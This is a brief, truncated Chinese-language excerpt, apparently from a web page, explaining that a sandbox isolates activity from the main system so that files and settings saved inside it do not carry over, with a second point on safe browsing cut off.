    1. **隔离环境**:理解沙箱的核心功能是提供一个与主系统隔离的环境,任何在沙箱中的活动都不会对真实系统产生直接影响。但同时,这意味着在沙箱内保存的文件或设置也不会在真实系统中保留。 2. **安全浏览**:使用...

Global site tag (gtag.js) - Google Analytics